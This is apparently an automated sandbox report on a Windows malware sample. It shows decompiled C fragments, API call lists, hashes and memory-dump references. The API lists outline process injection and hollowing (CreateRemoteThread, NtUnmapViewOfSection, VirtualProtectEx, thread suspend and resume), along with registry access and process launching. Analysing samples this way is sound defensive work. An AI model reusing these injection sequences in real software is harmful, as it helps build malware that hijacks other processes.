Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory

Similarity

Total matches: 9
API ID: HeapFreeStrStrI
String ID: pnls
API String ID: 4137399961-141991303
Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885

APIs

Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3

HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE

Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31

StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4

Strings

pnls, xrefs: 002E1451, 002E1460, 002E1477, 002E1484

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

